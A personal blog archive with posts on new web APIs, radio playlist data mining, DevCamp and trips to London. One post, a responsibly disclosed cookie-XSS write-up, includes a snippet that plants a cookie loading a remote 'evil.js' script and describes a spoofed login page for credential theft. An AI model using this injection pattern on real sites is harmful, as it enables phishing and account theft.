Tomorrow’s Web, Today

Maybe it’s because I was at Render Conf at the end of last month or perhaps it’s because Three Rings DevCamp – which always gets me inspired – was earlier this month, but I’ve been particularly excited lately to get the chance to play with some of the more “cutting edge” (or at least, relatively-new) web technologies that are appearing on the horizon. It feels like the Web is having a bit of a renaissance of development, spearheaded by the fact that it’s no longer Microsoft that are holding development back (but increasingly Apple) and, perhaps for the first time, the fact that the W3C are churning out standards “ahead” of where the browser vendors are managing to implement technical features, rather than simply reflecting what’s already happening in the world.

Ben Foxall at Render Conf 2017 discusses the accompanying JSOxford Hackathon. Hey, who’s that near the top-right?

It seems to me that HTML5 may well be the final version of HTML. Rather than making grand new releases to the core technology, we’re now – at last! – in a position where it’s possible to iteratively add new techniques in a resilient, progressive manner. We don’t need “HTML6” to deliver us any particular new feature, because the modern web is more-modular and is capable of having additional features bolted on. We’re in a world where browser detection has been replaced with feature detection, to the extent that you can even do non-hacky feature detection in pure CSS, now, and this (thanks to the nature of the Web as a loosely-coupled, resilient platform) means that it’s genuinely possible to progressively-enhance content and get on board with each hot new technology that comes along, if you want, while still delivering content to users on older browsers.
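For example, a stylesheet can opt in to grid layout only where the browser genuinely supports it, leaving everybody else on a simpler fallback – a minimal sketch (the class name is illustrative, not from any real project):

.gallery { display: block; }              /* fallback layout for older browsers */
@supports (display: grid) {
  /* Only browsers that truly implement grid ever read this block. */
  .gallery {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
  }
}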

And that’s the dream! A web of progressive-enhancement stays true to Sir Tim’s dream of universal interoperability while still moving forward technologically. I’ve no doubt that there’ll always be people who want to break the Web – even Google do it, sometimes – with single-page Javascript-only web apps, “app shell” websites, mobile-only or desktop-only experiences and “apps” that really ought to have been websites (and perhaps PWAs) to begin with… but the fact that the tools now exist to make a genuinely “progressively-enhanced” web, and that those tools are mainstream, is a big deal. If you don’t think we’re at that point yet, I invite you to watch Rachel Andrew’s fantastic presentation, “Start Using CSS Grid Layout Today”.

Three Rings’ developers hard at work at this year’s DevCamp.

Some of the things I’ve been playing with recently include:

Intersection Observers

Though it’s only really supported in Chrome so far (there’s a great polyfill), the Intersection Observer API is one of those technologies that make you say “why didn’t we have that already?” It’s very simple: all an Intersection Observer does is provide event hooks for target objects entering or leaving the viewport, without resorting to polling or hacky code attached to scroll events.

Intersection Observer example (animated GIF)

What’s it for? Well, the single most-obvious use case is lazy-loading images, à la Medium or Google Image Search: delivering users a placeholder image or a low-resolution copy until they scroll far enough for the image to come into view (or almost into view) and then downloading the full-resolution version and dynamically replacing it. My first foray into Intersection Observers was to take Medium’s approach and then improve it with a Service Worker in order to make it behave nicely even if the user’s Internet connection was unreliable, but I’ve since applied it to my Reddit browser plugin MegaMegaMonitor: rather than hammering the browser with Javascript, the plugin now waits until relevant content enters the viewport before performing resource-intensive tasks.
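A minimal sketch of that lazy-loading technique might look like this (assuming – my convention for this example, not any standard – that each image carries its full-resolution URL in a data-src attribute):

var observer = new IntersectionObserver(function(entries, observer) {
  entries.forEach(function(entry) {
    if (entry.isIntersecting) {
      var img = entry.target;
      img.src = img.dataset.src;   // swap in the full-resolution version
      observer.unobserve(img);     // each image only needs upgrading once
    }
  });
}, { rootMargin: '200px' });       // fire a little before it scrolls into view

document.querySelectorAll('img[data-src]').forEach(function(img) {
  observer.observe(img);
});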

Web Workers

I’d briefly played with Service Workers before and indeed we’re adding a Service Worker to the next version of Three Rings, which, in conjunction with a manifest.json and the service’s (ongoing) delivery over HTTPS (over H2, where available, since last year), technically makes it a Progressive Web App… and I’ve been looking for opportunities to make use of Service Workers elsewhere in my work, too… but my first dive into Web Workers was in introducing one to the upcoming version of MegaMegaMonitor.
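Registering a Service Worker, incidentally, is itself a nice little example of progressive enhancement at work (a minimal sketch – the script path is illustrative):

if ('serviceWorker' in navigator) {
  // Browsers without Service Worker support simply skip this and carry on.
  navigator.serviceWorker.register('/service-worker.js')
    .then(function(registration) {
      console.log('Service Worker registered with scope', registration.scope);
    });
}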

MegaMegaMonitor v155a Lists feature
MegaMegaMonitor’s processor-intensive “Lists” feature sees the most benefit from Web Workers

Web Workers add true multithreading to Javascript, and in the case of MegaMegaMonitor this means the possibility of pushing the more-intensive work that the plugin has to do out of the main thread, allowing the user to enjoy an uninterrupted browsing experience while the heavy lifting goes on in the background. Because I don’t control the domain on which this Web Worker runs (it’s reddit.com, of course!), I’ve also had the opportunity to play with Blobs, which provided a convenient way for me to inject Worker code onto somebody else’s website from within a userscript. This has also led me to the discovery that it ought to be possible to implement userscripts that inject Service Workers onto websites, which could be used to mash up additional functionality into websites far in advance of what is typically possible with a userscript… more on that if I get around to implementing such a thing.
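In case it’s useful to anybody else, here’s a sketch of the Blob trick (the worker body here is a stand-in for MegaMegaMonitor’s real heavy lifting):

// Build the worker's source as a string, wrap it in a Blob, and spawn a
// Worker from a blob: URL - handy when you can't host a separate script
// on the target domain.
var workerSource =
  'onmessage = function(e) {' +
  '  /* ...do something processor-intensive with e.data... */' +
  '  postMessage(e.data.length);' +
  '};';
var blob = new Blob([workerSource], { type: 'application/javascript' });
var worker = new Worker(URL.createObjectURL(blob));

worker.onmessage = function(e) {
  console.log('Worker finished; result:', e.data); // back on the main thread
};
worker.postMessage('some big chunk of data');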

Fetch

The last of the new technologies I’ve been playing with this month is the Fetch API. I’m not pulling any punches when I say that the Fetch API is exactly what XMLHttpRequests should have been from the very beginning. Understanding it properly has finally given me the confidence to stop using jQuery for the one thing I always seemed to depend on it for – that is, simplifying Ajax requests! I mean, look at this elegant code:

fetch('posts.json')
.then(function(response) {
  return response.json();
})
.then(function(json) {
  console.log(json.something.otherThing);
});

Whether or not you’re a fan of Javascript, you’ve got to admit that that’s infinitely more readable than XMLHttpRequest hackery (at least, without the help of a heavyweight library like jQuery).
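One caveat the example above glosses over: fetch only rejects its promise on network failure, not on HTTP error statuses like 404 or 500, so in production code you’d typically guard with a check on response.ok:

fetch('posts.json')
.then(function(response) {
  if (!response.ok) throw new Error('HTTP ' + response.status);
  return response.json();
})
.then(function(json) {
  console.log(json.something.otherThing);
});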

Other things I’ve been up to include Laser Duck Hunt, but that’s another story.

So that’s some of the stuff I’ve been playing with lately: Intersection Observers, Web Workers, Blobs, and the Fetch API. And I feel all full of optimism on behalf of the Web.


What Does Jack FM Sound Like?

Those who know me well know that I’m a bit of a data nerd. Even when I don’t know what I’m going to do with some data yet, it feels sensible to start collecting it in a nice machine-readable format from the word go. Because you never know, right? That’s how I’m able to tell you how much gas and electricity our house used on average on any day in the last two and a half years (and how much of that was offset by our solar panels).

Daily energy usage at Dan's house for the last few years. Look at the gas peaks in the winters, when the central heating ramps up!
The red lumps are winters, when the central heating comes on and starts burning a stack of gas.

So it should perhaps come as no huge surprise that for the last six months I’ve been recording the identity of every piece of music played by my favourite local radio station, Jack FM (don’t worry: I didn’t do this by hand – I wrote a program to do it). At the time, I wasn’t sure whether there was any point to the exercise… in fact, I’m still not sure. But hey: I’ve got a log of the last 45,000 songs that the radio station played: I might as well do something with it. The Discogs API proved invaluable in automating the discovery of metadata relating to each song, such as the year of its release (I wasn’t going to do that by hand either!), and that gave me enough data to, for example, do this (click on any image to see a bigger version):
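For the curious, that kind of lookup is pleasingly simple using the Fetch API I was singing the praises of above – here’s a sketch of the sort of query my program performs (endpoint and field names are from my reading of the Discogs API documentation; the token is a placeholder for your own):

// Look up a song on Discogs and pull out the release year of the first
// matching result. (A real program would want rate-limiting and error
// handling, too.)
fetch('https://api.discogs.com/database/search' +
      '?artist=INXS&track=Disappear&token=YOUR_DISCOGS_TOKEN')
.then(function(response) { return response.json(); })
.then(function(json) {
  var first = json.results[0];
  console.log(first.title + ' (' + first.year + ')');
});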

Jack FM: Decade Frequency by Hour
Decade frequency by hour: you’ve got a good chance of 80s music at any time, but lunchtime’s your best bet (or perhaps just after midnight). Note that times are in UTC+2 in this graph.

I almost expected a bigger variance by hour-of-day, but I guess that Jack isn’t in the habit of pandering to its demographics too heavily. I spotted the post-midnight point at which you get almost a plurality of music from 1990 or later, though: perhaps that’s when the young ‘uns who can still stay up that late are mostly listening to the radio? What about by day-of-week, then:

Jack FM: Decade Frequency by Day of Week
Even less in it by day of week… although 70s music fans should consider tuning in on Fridays, apparently, and 80s fans will be happiest on Sundays.

The chunks of “bonus 80s” shouldn’t be surprising, I suppose, given that the radio station advertises that that’s exactly what it does at those times. But still: it’s reassuring to know that when a radio station claims to play 80s music, you don’t just have to take their word for it (so long as their listeners include somebody as geeky as me).

It feels to me like every time I tune in they’re playing an INXS song. That can’t be a coincidence, right? Let’s find out:

Jack FM: Artist Frequency
One in every ten songs are by just ten artists (including INXS). One in every four are by just 34 artists.

Yup, there’s a heavy bias towards Guns ‘n’ Roses, Michael Jackson, Prince, Oasis, Bryan Adams, Madonna, INXS, Bon Jovi, Queen, and U2 (who collectively are responsible for over a tenth of all music played on Jack FM), and – to a lesser extent – towards Robert Palmer, Meatloaf, Blondie, Green Day, Texas, Whitesnake, the Pet Shop Boys, Billy Idol, Madness, Rainbow, Elton John, Bruce Springsteen, Aerosmith, Fleetwood Mac, Phil Collins, ZZ Top, AC/DC, Duran Duran, the Police, Simple Minds, Blur, David Bowie, Def Leppard, and REM: taken together, one in every four songs played on Jack FM is by one of these 34 artists.

Jack FM: Top 20
Amazingly, the most-played song on Jack FM (Alice Cooper’s “Poison”) is not by one of the most-played 34 artists.

I was interested to see that the “top 20 songs” played on Jack FM these last six months include several songs by artists who otherwise aren’t represented at all on the station. The most-played song is Alice Cooper’s Poison, but I’ve never recorded them playing any other Alice Cooper songs (boo!). The fifth-most-played song is Fight For Your Right, by the Beastie Boys, but that’s the only Beastie Boys song I’ve caught them playing. And the seventh-most-played – Roachford’s Cuddly Toy – is similarly the only Roachford song they ever put on.

Next I tried a Markov chain analysis. Markov chains are a mathematical tool that examines a sequence (in this case, a sequence of songs) and builds a map of “chains” of sequential songs, recording the frequency with which they follow one another – here’s a great explanation and playground. The same technique is used by “predictive text” features on your smartphone: it knows what word to suggest you type next based on the patterns of words you most-often type in sequence. And running some Markov chain analysis helped me find some really… interesting patterns in the playlists. For example, look at the similarities between what was played early in the afternoon of Wednesday 19 October and what was played 12 hours later, early in the morning of Thursday 20 October:
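If you want a feel for the technique, here’s a minimal sketch of a first-order chain over a playlist: it simply counts how often each song follows each other song; unusually high counts hint at reused, non-random sequences like the one shown below.

function buildChain(playlist) {
  var chain = {};
  for (var i = 0; i < playlist.length - 1; i++) {
    var from = playlist[i], to = playlist[i + 1];
    chain[from] = chain[from] || {};
    chain[from][to] = (chain[from][to] || 0) + 1;   // count the transition
  }
  return chain;
}

var chain = buildChain([
  'Kool & The Gang – Fresh',
  'Bruce Springsteen – Dancing In The Dark',
  'Maxi Priest – Close To You'
  // ...and the other ~45,000 logged songs...
]);
console.log(chain['Kool & The Gang – Fresh']);
// e.g. { 'Bruce Springsteen – Dancing In The Dark': 2, ... }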

(A “–” in a time column marks a song that appeared in only one of the two playlists.)

19 Oct 2016   20 Oct 2016   Song
12:06:33      00:13:56      Kool & The Gang – Fresh
12:10:35      00:17:57      Bruce Springsteen – Dancing In The Dark
12:14:36      00:21:59      Maxi Priest – Close To You
12:22:38      00:25:00      Van Halen – Why Can’t This Be Love
12:25:39      00:29:01      Beats International / Lindy – Dub Be Good To Me
12:29:40      00:33:02      Kasabian – Fire
12:33:42      00:38:04      Talk Talk – It’s My Life
12:41:44      00:42:05      Lenny Kravitz – Are You Gonna Go My Way
12:45:45      00:45:06      Shalamar – I Can Make You Feel Good
12:49:47      00:50:07      4 Non Blondes – What’s Up
12:55:49      00:54:09      Madness – Baggy Trousers
–             00:56:09      Eagle Eye Cherry – Save Tonight
–             01:04:12      Feeling – Love It When You Call
13:02:51      01:10:14      Fine Young Cannibals – Good Thing
13:06:54      01:14:15      Blur – There’s No Other Way
13:09:55      01:17:16      Pet Shop Boys – It’s A Sin
13:14:56      01:22:18      Zutons – Valerie
13:22:59      01:26:19      Cure – The Love Cats
13:27:01      01:30:20      Bryan Adams / Mel C – When You’re Gone
13:30:02      01:33:21      Depeche Mode – Personal Jesus
13:34:03      01:38:22      Queen – Another One Bites The Dust
13:42:06      01:42:23      Shania Twain – That Don’t Impress Me Much
13:45:07      01:46:25      ZZ Top – Gimme All Your Lovin’
13:49:09      01:50:26      Abba – Mamma Mia
13:53:10      01:53:27      Survivor – Eye Of The Tiger
–             01:57:28      Scouting For Girls – Elvis Aint Dead
–             02:00:29      Verve – Lucky Man
–             02:05:30      Fleetwood Mac – Say You Love Me
14:03:13      02:10:31      Kiss – Crazy Crazy Nights
14:07:15      02:14:33      Lightning Seeds – Sense
14:11:16      02:18:34      Pretenders – Brass In Pocket
14:14:17      02:21:35      Elvis Presley / JXL – A Little Less Conversation
14:22:19      02:24:36      U2 – Angel Of Harlem
14:25:20      02:28:37      Trammps – Disco Inferno
14:29:22      02:31:38      Cast – Guiding Star
14:33:23      02:36:39      New Order – Blue Monday
14:41:26      02:40:41      Def Leppard – Let’s Get Rocked
14:46:28      02:45:42      Phil Collins – Sussudio
14:50:30      02:49:43      Shawn Mullins – Lullaby
14:55:31      02:53:45      Stars On 45 – Stars On 45
16:06:35      03:00:47      Dead Or Alive – You Spin Me Round Like A Record
16:09:36      03:03:48      Dire Straits – Walk Of Life
16:13:37      03:07:49      Keane – Everybody’s Changing
16:17:39      03:10:50      Billy Idol – Rebel Yell
16:25:41      03:14:51      Stealers Wheel – Stuck In The Middle
16:28:42      03:18:52      Green Day – American Idiot
16:33:44      03:21:53      A-Ha – Take On Me
16:36:45      03:26:54      Cranberries – Dreams
–             03:30:56      Elton John – Philadelphia Freedom
–             03:36:57      Inxs – Disappear
–             03:40:59      Kim Wilde – You Keep Me Hanging On
16:44:47      –             Living In A Box – Living In A Box
16:47:48      03:45:00      Status Quo – Rockin’ All Over The World

The similarities between those playlists (which include a 20-songs-in-a-row streak!) surely can’t be coincidence… but they do go some way to explaining why listening to Jack FM sometimes gives me a feeling of déjà vu (along with, perhaps, the no-talk, all-jukebox format). Looking elsewhere in the data I found dozens of other similar occurrences, though none that were both such long chains and in such close proximity to one another. What does it mean?

There are several possible explanations, including:

  • The exotic, e.g. they’re using Markov chains to control an auto-DJ, and so just sometimes it randomly chooses to follow a long chain that it “learned” from a real DJ.
  • The silly, e.g. Jack FM somehow knew that I was monitoring them in this way and are trying to troll me.
  • My favourite: these two are actually the same playlist, but with breaks interspersed differently. During the daytime, the breaks in the list are more-frequent and longer, which suggests: ad breaks! Advertisers are far more-likely to pay for spots during the mid-afternoon than they are in the middle of the night (the gap in the overnight playlist could well be a short ad or a jingle), which would explain why the two are different from one another!

But the question remains: why reuse playlists in close proximity at all? Even when the station operates autonomously, as it clearly does most of the time, it’d surely be easy enough to set up an auto-DJ using “smart random” (because truly random shuffles don’t sound random to humans) to get the same or a better effect.
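(By “smart random” I mean something like the sketch below – pick songs at random, but re-draw whenever an artist has played too recently, which is roughly what listeners expect “random” to feel like. The song objects and gap size are illustrative.)

function smartShuffle(songs, minArtistGap) {
  var pool = songs.slice(), result = [];
  while (pool.length) {
    var pick = Math.floor(Math.random() * pool.length);
    var recentArtists = result.slice(-minArtistGap).map(function(s) { return s.artist; });
    var anyEligible = pool.some(function(s) { return recentArtists.indexOf(s.artist) === -1; });
    if (anyEligible && recentArtists.indexOf(pool[pick].artist) !== -1) {
      continue;   // that artist played too recently: draw again
    }
    result.push(pool.splice(pick, 1)[0]);
  }
  return result;
}

// e.g. never repeat an artist within five songs:
var playlist = smartShuffle([{ artist: 'INXS', title: 'Disappear' } /* , ... */], 5);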

Jack FM Style Guide
One of the things I love about Jack FM is how little they take seriously. Like their style guide.

Which leads to another interesting observation: Jack FM’s sister stations in Surrey and Hampshire also maintain a similar playlist most of the time… which means that they’re either synchronising their ad breaks (including their duration – I suspect this is the case) or else using filler jingles to line up content with the beginnings and ends of songs. It’s a clever operation, clearly, but it’s not beyond black-box comprehension. More research is clearly needed. (And yes, I’m sure I could just call up and ask – they call me “Newcastle Dan” on the breakfast show – but that wouldn’t be even half as fun as the data mining is…)


A Suitable Blog

At a little over 590 thousand words and spanning 1,349 pages, Vikram Seth’s A Suitable Boy is almost-certainly among the top ten longest single-volume English-language novels. It’s pretty fucking huge.

A Suitable Boy, seen from the edge
I’ll stick with the Kindle edition: I fear that merely holding the paperback would be exhausting.

I only discovered A Suitable Boy this week (and haven’t read it – although there are some good reviews that give me an inclination to) when, on a whim, I decided to try to get a sense of the scale of how much I’d ever written on this blog and then decided I needed something tangible to use as a comparison. Because – give or take – that’s how much I’ve written here, too:

Graph showing cumulative words written on this blog, peaking at 593,457.
At 593,457 words, this blog wouldn’t fit into that book unless we printed it on the covers as well.

Of course, there are some caveats that might make you feel that the total count should be lower:

  • It might include a few pieces of non-content code, here and there. I tried to strip them out for the calculation, but I wasn’t entirely successful.
  • It included some things which might be considered metadata, like image alt-text (on the other hand, sometimes I like to hide fun messages in my image alt-text, so perhaps they should be considered content).

On the other hand, there are a few reasons that it perhaps ought to be higher:

  • It doesn’t include any of the content “lost” during the July 2004 server failure, some of which (like this post about Orange) were later recovered but many of which (like this post about Christmas plans and upcoming exams) remain damaged. It also doesn’t include any of the lost content from the original 1998/1999 version of this blog, only the weird angsty-teen out-of-context surviving bits.
  • Post titles (which sometimes contain part of the content) and pages outside of blog posts are not included in the word count.
  • I’ve removed all pictures for the purpose of the word count. Tempting though it was to make each worth a thousand words, that’d amount to about another one and a half million words, which seemed a little excessive.
A delicious-looking BLT. Mmm, bacon.
Another reason for not counting images was that it was harder than you’d think to detect repeat use of images that I’ve used too many times. Like this one.

Of course, my blog doesn’t really have a plot like A Suitable Boy (it might compare better to the even wordier Atlas Shrugged, though…): it’s a mixture of mostly autobiographical wittering interspersed with musings on technology and geekery and board games and magic and VR and stuff. I’m pretty sure that if, 18 years ago (which is approximately when I first started blogging), I’d known where my life would be now, I’d have, y’know, tried to tie it all together with an overarching theme and some character development or something.

Or perhaps throw in the odd plot twist or surprise: something with some drama to keep the reader occupied, rather than just using the web as a stream-of-consciousness diary of whatever it is I’m thinking about that week. I could mention, for example, that there’ll be another addition to our house later this year. You heard it here first (unless you already heard it from somewhere else first, in which case you heard it there first).

Annabel sitting on her daddy's knee and looking at sonograph pictures of her future baby brother.
Brought up in a world of tiny, bright, UHD colour touchscreens, Annabel seemed slightly underwhelmed by the magic of a sonograph picture of her future baby brother.

Still: by the end of this post I’ll have hit a nice, easy-to-remember 594,000 words.


Anatomy of Cookie XSS

A cross-site scripting vulnerability (shortened to XSS, because CSS already means other things) occurs when a website can be tricked into showing a visitor unsafe content that came from another site visitor. Typically when we talk about an XSS attack, we’re talking about tricking a website into sending Javascript code to the user: that Javascript code can then be used to steal cookies and credentials, vandalise content, and more.

Good web developers know to sanitise input – making anything given to their pages by a user safe before ever displaying it on a page – but even the best can forget quite how many things really are “user input”.

"Who Am I?" page provided by University of Oxford IT Services.
This page outputs a variety of your inputs right back at you.

Recently, I reported a vulnerability in the University of Oxford’s IT Services’ web pages that’s a great example of this. The page (which isn’t accessible from the public Internet, and is now fixed) is designed to help network users diagnose problems. When you connect to it, it tells you a lot of information about your connection: what browser you’re using, your reverse DNS lookup and IP address, etc. The developer clearly understood that XSS was a risk, because if you pass a query string to the page, it’s escaped before it’s returned back to you. But unfortunately, the developer didn’t consider the fact that virtually anything given to you by the browser can be manipulated, and so can’t be trusted.

My Perl program, injecting XSS code into the user's cookie and then redirecting them.
To demonstrate this vulnerability, I had the option of writing Perl or Javascript. For some reason, I chose Perl.

In this case, I noticed that the page would output any cookies that you had from the .ox.ac.uk domain, without escaping them. .ox.ac.uk cookies can be manipulated by anybody who has access to write pages on the domain, which – thanks to the users.ox.ac.uk webspace – means any staff or students at the University (or, in an escalation attack, anybody who’s already compromised the account of a staff member or student). The attacker can set up a web page that sets such a “poisoned” cookie and then redirects the user to the affected page; from there, they can do whatever they want. In my case, I experimented with showing a fake single sign-on login page, almost indistinguishable from the real thing (it even has a legitimate-looking .ox.ac.uk domain name served over an HTTPS connection, padlock and all). At this stage, a real attacker could use a spear phishing scam to trick users into clicking a link to their page and start stealing credentials.
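To illustrate (with placeholder URLs rather than the real pages), the poisoning page needs only a couple of lines of Javascript:

// Plant a script-bearing cookie scoped to the whole parent domain, then
// bounce the victim to the vulnerable diagnostic page, which echoes
// cookies back into its markup without escaping them.
document.cookie = 'diag=<script src="https://users.ox.ac.uk/~attacker/evil.js"></script>' +
                  '; domain=.ox.ac.uk; path=/';
location.href = 'https://diagnostics.example.ox.ac.uk/'; // placeholder address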

A fake SSO login page, delivered from a legitimate-looking https URL.
The padlock, the HTTPS url, and the convincing form make this page look legitimate. But it’s actually spoofed.

I’m sure that I didn’t need to explain why XSS vulnerabilities are dangerous. But I wanted to remind you all that truly anything that comes from the user’s web browser, even if you think that you probably put it there yourself, can’t be trusted. When you’re defending against XSS attacks, your aim isn’t just to sanitise obvious user input like GET and POST parameters, but also anything that arrives in a browser header – including cookies and Referer headers – especially if your domain name carries websites managed by many different people. In an ideal world, Content Security Policy would mitigate all these kinds of attacks: but in our real world – sanitise those inputs!
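In other words (a minimal sketch in Node.js-style Javascript; escapeHtml here is a simple illustrative helper, not any particular library’s):

var http = require('http');

function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

http.createServer(function(request, response) {
  response.writeHead(200, { 'Content-Type': 'text/html' });
  // Treat *everything* the browser sent as hostile, cookies included:
  response.write('Your cookies: ' + escapeHtml(request.headers.cookie || ''));
  response.end('Referer: ' + escapeHtml(request.headers.referer || ''));
}).listen(8080);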


Underground and Overground in the City of London

Despite being only a short journey away (made even shorter by the new railway station that appeared near my house last year), I rarely find myself in London. But once in a while a week comes along when I feel like I’m there all the time.

British Rail branded poster from an abandoned tunnel under Euston Station, circa 1960s.

On Friday of last week, Ruth, JTA and I took one of the London Transport Museum‘s Hidden London tours. Back in 2011 we took a tour of Aldwych Tube Station, probably the most well-known of the London Underground’s disused stations, and it was fantastic, so we were very excited to be returning for another of their events. This time around, we were visiting Euston Station.

Our tour group gathers around the corner from Euston Station.
Stylish hi-vis jackets for everybody!

But wait, you might well say: Euston station is neither hidden nor disused! And you’d be right. But Euston’s got a long and convoluted history, and it used to consist of not one but three stations: the mainline station and two independent underground stations run by competing operators. The stations all gradually got connected with tunnels, and then with a whole different set of tunnels as part of the redevelopment in advance of the station’s reopening in 1968. But to this day, there’s still a whole network of tunnels underneath Euston station, inaccessible to the public, that are either disused or else used only as storage, air vents, or cable runs.

Disused lift shaft under Euston Station.
This lift shaft used to transport passengers between what are now the Northern and Victoria lines. Now it’s just a big hole.

A particular highlight was getting to walk through the ventilation shaft that draws all of the hot air out of the Victoria Line platforms. When you stand and wait for your train you don’t tend to think about the network of tunnels that snake around the one you’re in, hidden just beyond the grills in the ceiling or through the doors at the end of the platforms. I shot a video (below) from the shaft, periodically looking down on the trains pulling in and out below us.

No sooner were we back than I was away again. Last Saturday, I made my way back to London to visit Twitter’s UK headquarters in Soho to help the fantastic Code First: Girls team to make some improvements to the way they organise and deliver their Javascript, Python and Ruby curricula. I first came across Code First: Girls through Beverley, one of Three Rings’ volunteers who happens to work for them, and I’ve become a fan of their work. Unfortunately my calendar’s too packed to be able to volunteer as one of their instructors (which I totally would if it weren’t for work, and study, and existing volunteering, and things), but I thought this would be a good opportunity to be helpful while I had a nominally-“spare” day.

The coffee lounge on the administration/marketing floor of Twitter's offices in Soho.
Twitter’s offices, by the way, are exactly as beautiful as you’d hope that they might be.

Our host tried to win me over on the merits of working for Twitter (they’re recruiting heavily in the UK, right now), and you know what – if I were inclined towards a commute as far as London (and I didn’t love the work I do so much) – I’d totally give that a go. And not just because I enjoyed telling an iPad what I wanted to drink and then having it dispensed minutes later by a magical automated hot-and-cold-running-drinks tap nearby.

Twitter's reception with its "tweet wall" sculpture.
I’m not sure I ‘get’ the idea of a sculpture of tweets, though. Wouldn’t a “live display” have been more-thematic?

And that’s not even all of it. This coming Thursday, I’m back in London again, this time to meet representatives from a couple of charities who’re looking at rolling out Three Rings. In short: having a direct line to London on my doorstep turns out to be pretty useful.


recruit.ox.ac.uk Permalink Generator

If you’ve ever applied for a job with my employer, the University of Oxford, you’ll have come across recruit.ox.ac.uk, one of the most-frustrating websites in the world. Of its many problems, the biggest (in my mind) is that it makes it really hard to share or save the web address of a particular job listing. That’s because instead of using individual web addresses to correspond to individual jobs, like any sanely-designed system would, it uses Javascript hackery and black magic to undermine the way your web browser was designed to work (which is why, you’ll find, you can’t “open in new tab” properly either), and instead provides its own, inferior, interface.

Some day I might get around to writing e.g. a userscript and/or browser plugin that “fixes” the site – from a user’s perspective, at least. But for the time being, because this morning I needed to share via social media a link to a UX developer post we’ve just advertised, I’ve come up with a little bookmarklet to fix this single problem:

recruit.ox.ac.uk Permalink Generator

Drag the bookmarklet to your bookmarks toolbar, then – when on the recruit.ox.ac.uk site – click it to use it.

This tool makes it easy to get permalinks (web addresses you can save or share) for job listings on recruit.ox.ac.uk. It might be adaptable to make it work with other CoreHR-powered systems, if it turns out that this missing feature comes from the underlying software that powers the site: it could also form the basis of a future userscript that would automatically fix the site “on the fly”. Here’s how to use it:

  1. Drag the link below into your browser’s bookmarks (e.g. the bookmarks toolbar).

    recruit.ox.ac.uk permalink

  2. When you’re on a recruit.ox.ac.uk job page, click on the bookmark. A permalink will appear at the top of the page, for your convenience. If you’re using a modern browser, the permalink will also appear in the address bar.
  3. Copy the permalink and use it wherever you need it, e.g. to share the link to a job listing.
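For the curious, the general shape of such a bookmarklet might look something like this (the way the job ID is located below is entirely hypothetical – the real code depends on recruit.ox.ac.uk’s actual markup):

javascript:(function(){
  /* Find the job's ID somewhere in the page: this selector is a stand-in. */
  var id = document.querySelector('#jobId').textContent.trim();
  var url = location.origin + location.pathname + '?jobId=' + encodeURIComponent(id);
  /* Show the permalink at the top of the page... */
  var p = document.createElement('p');
  p.textContent = 'Permalink: ' + url;
  document.body.insertBefore(p, document.body.firstChild);
  /* ...and, in modern browsers, pop it into the address bar too. */
  if (history.replaceState) history.replaceState(null, '', url);
})();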

If you have any difficulty with it or want help adapting it for use with other CoreHR systems, give me a shout.

DevCamp – have we really been doing this for 7 years?

An annual tradition at Three Rings is DevCamp, an event that borrows from the “hackathon” concept and expands it to a week-long code-producing factory for the volunteers of the Three Rings development team. Motivating volunteers is a very different game to motivating paid employees: you can’t offer to pay them more for working harder nor threaten to stop paying them if they don’t work hard enough, so it’s necessary to tap in to whatever it is that drives them to be a volunteer, and help them get more of that out of their volunteering.

Table full of computers at DevCamp 2011.
This photo, from DevCamp 2011, is probably the only instance where I’ve had fewer monitors out than another developer.

At least part of what appeals to all of our developers is a sense of achievement – of producing something that has practical value – as well as of learning new things, applying what they’ve learned, and having a degree of control over the parts of the project they contribute most-directly to. Incidentally, these are the same things that motivate paid developers, too, if a Google search for studies on the subject is to be believed. It’s just that employers are rarely able or willing to offer all of those things (and even if they can, you can’t use them to pay your mortgage), so they have to put money on the table too. With my team at Three Rings, I don’t have money to give them, so I have to make up for it with a surplus of those things that developers actually want.

A developer hides inside a handmade camera obscura to watch the solar eclipse at DevCamp 2015.
At the 2015 DevCamp, developers used the solar eclipse as an excuse for an impromptu teambuilding activity: making a camera obscura out of stuff we had lying about.

It seems strange to me in hindsight that for the last seven years I’ve spent a week of my year taking leave from my day job in order to work longer, harder, and unpaid for a voluntary project… but that I haven’t yet blogged about it. Over the same timescale I’ve spent about twice as long at DevCamp than I have, for example, skiing, yet I’ve managed to knock out several blog posts on that subject. Part of that might be borne out of the secretive nature of Three Rings, especially in its early days (when involvement with Three Rings pretty-much fingered you as being a Nightline volunteer, which was frowned upon), but nowadays we’ve got a couple of dozen volunteers with backgrounds in a variety of organisations: and many of those of us that ever were Nightliner volunteers have long since graduated and moved-on to other volunteering work besides.

DevCamp and DocsCamp 2016 volunteers play Betrayal at the House on the Hill
Semi-cooperative horror-themed board games by candlelight are a motivator for everybody, right?

Part of the motivation – one of the perks of being a Three Rings developer – for me at least, is DevCamp itself. Because it’s an opportunity to drop all of my “day job” stuff for a week, go to some beautiful far-flung corner of the country, and (between early-morning geocaching/hiking expeditions and late night drinking tomfoolery) get to spend long days contributing to something awesome. And hanging out with like-minded people while I do so. I like a good hackathon of any variety, but I love me some Three Rings DevCamp!

Geocache GC4EE6C, with accompanying caterpillar and mushroom
The geocaches near DevCamp 2016 were particularly fabulous, though. Like this one – GC4EE6C – part of an Alice In Wonderland-themed series.

So yeah: DevCamp is awesome. It’s more than a little different from those days back in 2003 when I wrote all the code and Kit worked hard at distracting me with facts about the laws of Hawaii – for the majority of DevCamp 2016 we had half a dozen developers plus two documentation writers in attendance! – but it’s still fundamentally about the same thing: producing a piece of software that helps about 25,000 volunteers do amazing things and make the world a better place. We’ve collectively given tens, maybe hundreds of thousands of hours of time in developing and supporting it, but that in turn has helped to streamline the organisation of about 16 million person-hours of other volunteering.

So that’s nice.

Developers marvel at one another's code, etc.
An end-of-day “Show & Tell” session at DevCamp 2016.

Oh, and I was delighted that one of my contributions this DevCamp was that I’ve finally gotten around to expanding the functionality of the “gender” property so that there are now more than three options. That’s almost more-exciting than the geocaches. Almost.

Edit: added a missing word in the sentence about how much time our volunteers had given, making it both more-believable and more-impressive.


Immersive Storytelling – Thoughts on Virtual Reality, part 3

This is the (long-overdue) last in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

For the first time in two decades, I’ve been playing with virtual reality. This time around, I’ve been using new and upcoming technologies like Google Cardboard and the Oculus Rift. I’m particularly interested in how these new experiences can be used as a storytelling medium by content creators, and the lessons we’ll learn about immersive storytelling by experimenting with them.

